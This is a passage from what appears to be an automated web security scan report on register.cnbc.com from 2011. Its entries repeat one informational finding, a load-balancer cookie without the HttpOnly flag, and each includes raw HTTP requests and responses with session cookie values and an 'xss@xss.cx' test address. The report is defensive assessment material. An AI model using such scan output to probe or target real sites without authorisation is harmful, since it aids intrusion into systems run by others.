User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:46 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Password is required</description>
<timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp>

...[SNIP]...

13.155. https://register.cnbc.com/checkscreenname.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkscreenname.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkscreenname.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 227
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>User name is required</description>
<timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp>

...[SNIP]...

13.156. https://register.cnbc.com/checkzipcode.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkzipcode.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkzipcode.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Zip Code is required</description>
<timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp>

...[SNIP]...

13.157. https://register.cnbc.com/createUser.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /createUser.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /createUser.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:45 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/
Content-Length: 54215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...

13.158. https://register.cnbc.com/css/forgotPassword.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/forgotPassword.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/forgotPassword.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 01 Jun 2009 14:04:23 GMT
ETag: "415-46b49e73a87c0"
Accept-Ranges: bytes
Content-Length: 1045
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

div{}
.headerImage{margin-top:5px}
.mainContent{width:970px;padding:0px;}
.mainContent .heading{font-family:Arial;font-size:16;font-weight:bold;color:#2D648A;margin-bottom:20px;margin-top:40px;margin-
...[SNIP]...

13.159. https://register.cnbc.com/css/member_center_sytles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/member_center_sytles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/member_center_sytles.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "135b-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 4955
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

/* CSS Document */
.cnbc_member_center_backbg{
   background-image:url(../images/registration-04.jpg);
   background-repeat:repeat;
   
}

.cnbc_member_center_headerbg{
   background-image:url(../images/membe
...[SNIP]...

13.160. https://register.cnbc.com/css/newRegistration.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/newRegistration.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/newRegistration.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:31 GMT
ETag: "1778-47d9ed5bbc4c0"
Accept-Ranges: bytes
Content-Length: 6008
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

body{background-color:#FFFFFF;margin:0px; padding:0px}
div{}
/*
border:1px solid
*/

.mainContent{width:635px;padding:0px;}

.headerMessage{font-family:Arial;font-size:17;font-weight:bold;color:#4248
...[SNIP]...

13.161. https://register.cnbc.com/css/registration.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/registration.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/registration.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "2a54-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 10836
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

.bodyclass {
margin-top: 0px;
background-image:url(../images/tile.gif);
background-repeat:repeat;

}
.regis_copyright {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 11px;
   font-
...[SNIP]...

13.162. https://register.cnbc.com/email/EmailSupport.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /email/EmailSupport.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 91322


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <script lang="javascript" src="js/subjects.js"></script>
<title>Contact Customer Service</
...[SNIP]...

13.163. https://register.cnbc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339311702; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:01:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

13.164. https://register.cnbc.com/forgotPassword1.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /forgotPassword1.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /forgotPassword1.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
Content-Length: 45
Cache-Control: max-age=0
Origin: https://register.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339333234; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/images/clickToContinue.gif%2526ot%253DIMAGE

step=step1&emailAddress=xss%40xss.cx&x=21&y=7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:14 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/
Content-Length: 85679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...

13.165. https://register.cnbc.com/forgotpassword1.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /forgotpassword1.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgotpassword1.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:01:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://register.cnbc.com/forgotPassword.do
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/


13.166. https://register.cnbc.com/images/clickToContinue.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/clickToContinue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/clickToContinue.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Fri, 29 May 2009 14:10:16 GMT
ETag: "4a4-46b0da2bec200"
Accept-Ranges: bytes
Content-Length: 1188
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

GIF89a~.................................BHXNSbOTcY^l[`nZ_m~..|..............ejvhmypu.ty.............rw..................................................................................................
...[SNIP]...

13.167. https://register.cnbc.com/images/loaderImage.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/loaderImage.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/loaderImage.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "109e-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 4254
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

GIF89a.......,*,.........dfd...............DFD...trt..................464.........ljl............TVT...tvt...!..NETSCAPE2.0.....!.......,............$j..Ab.J..I.*U.*..).*..@$.........\N....(.:
H..Cd6
...[SNIP]...

13.168. https://register.cnbc.com/images/memberCenterHeader.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/memberCenterHeader.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/memberCenterHeader.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "2a29-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 10793
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

......JFIF.....H.H.....5Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:02:10 13:45:24.........
...[SNIP]...

13.169. https://register.cnbc.com/images/submitPreferences.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/submitPreferences.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/submitPreferences.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "334c-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 13132
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:02:10 13:53:01.........
...[SNIP]...

13.170. https://register.cnbc.com/images/tick.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/tick.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tick.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3a40-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 14912
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
